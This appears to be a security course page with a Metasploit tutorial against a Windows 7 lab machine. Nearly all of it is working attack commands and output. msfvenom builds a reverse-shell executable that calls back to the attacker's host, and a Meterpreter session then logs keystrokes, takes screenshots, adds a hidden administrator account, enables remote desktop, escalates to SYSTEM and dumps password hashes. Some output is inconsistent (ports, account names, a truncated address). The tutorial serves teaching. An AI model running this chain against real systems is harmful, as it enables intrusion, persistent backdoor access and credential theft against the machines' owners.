MetasploitObjectives[Back] The key objectives of this chapter are:
LectureTestsRelated Material
SlidesThe slides for the chapter are [here] TutorialThis article shows how to create a remote desktop in Windows 7 using Metasploit. The attacker uses a reverse TCP connection to make a call-back to the attacking host. In this case the attacking host is at 10.200.0.208. Creating the VulnerabilityThe vulnerability will create a call-back from the Windows 7 instance to Metasploit. So if the attacking host is at 10.200.0.208 (and the attacked host is at 10.200.0.205), and we callback on port 1234, then we create the exploit with: msfvenom -p windows/shell_reverse_tcp LHOST=10.200.0.208 LPORT=1234 -f exe > winexp.exe Next we would save this to the instance. Using MetasploitOnce the exploit is on the device, we can use Metasploit to compromise it. To start the Metasploit console from Kali we run: msfconsole msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 10.200.0.208 LHOST => 10.200.0.208 msf exploit(handler) > set LPORT 1234 LPORT => 1234 msf exploit(handler) > exploit [*] Started reverse handler on 10.200.0.208:4444 [*] Starting the payload handler... [*] Sending stage (770048 bytes) to 10.200.0.205 [*] Meterpreter session 1 opened (10.200.0.208:4444 -> 10.200.0.205:49265) at 2015-01-01 16:54:07 -0500 We can capture keystrokes with: meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter > keyscan_dump Dumping captured keystrokes... hello meterpreter > keyscan_stop Next run a process: meterpreter > execute -f calc.exe Process 3780 created. meterpreter > screenshot Screenshot saved to: /root/zJVqTTaq.jpeg meterpreter > getuid Server username: Encase-PC1\Encase meterpreter > sysinfo Computer : ENCASE-PC1 OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : en_GB Meterpreter : x86/win32 meterpreter > getsid Server SID: S-1-5-21-3026846657-1272420173-2154099446-1000 meterpreter > ifconfig Interface 13 ============ Name : Intel(R) PRO/1000 MT Network Connection Hardware MAC : 00:50:56:ab:68:00 MTU : 1500 IPv4 Address : 10.200.0.205 IPv4 Netmask : 255.255.255.0 Next we can create a new user (with getgui -u "user" -p "password"), and enable a remote desktop (with getgui -e): meterpreter > run getgui -u newuser -p pass [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez carlos_perez@darkoperator.com [*] Setting user account for logon [*] Adding User: newuser with Password: pass [*] Hiding user from Windows Login screen [*] Adding User: hacker to local group 'Remote Desktop Users' [*] Adding User: hacker to local group 'Administrators' [*] You can now login with the created user [*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4028.rc meterpreter > run getgui -e [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez carlos_perez@darkoperator.com [*] Enabling Remote Desktop [*] RDP is disabled; enabling it ... [*] Setting Terminal Services service startup mode [*] The Terminal Services service is not set to auto, changing it to auto ... [*] Opening port in local firewall if necessary [*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4353.rc 0.200.0.205 - Meterpreter session 3 closed. Reason: User exit msf exploit(handler) > exit We can then call-up the remote desktop with: root@kali:~# rdesktop -u newuser -p pass 10.200.0.205 WARNING: Remote desktop does not support colour depth 24; falling back to 16 Now let's get the password hash values. meterpreter > hashdump [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect. meterpreter > getuid Server username: Encase-PC1\Encase We do not have the privilege to get the password hashes, so we locate a process which has a high privilege, and migrate it: meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process 42949 4 0 System x86_64 0 264 4 smss.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\..\smss.exe 364 524 svchost.exe x86_64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\..\svchost.exe 372 364 csrss.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\..\csrss.exe 388 524 spoolsv.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\..spoolsv.exe 420 364 wininit.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\..\wininit.exe 524 420 services.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\..\services.exe 532 420 lsass.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\..\lsass.exe 540 420 lsm.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\..lsm.exe 632 524 svchost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\..\svchost.exe 708 524 svchost.exe x86_64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\..\svchost.exe 788 524 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\..\svchost.exe 832 524 svchost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\..\svchost.exe 856 524 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\..\svchost.exe meterpreter > migrate 832 [*] Migrating from 2436 to 832... [*] Migration completed successfully. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Encase:1000:aad3b435b51404eeaad3b435b51404ee:307e40814e7d4e103f6a69b04ea78f3d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: |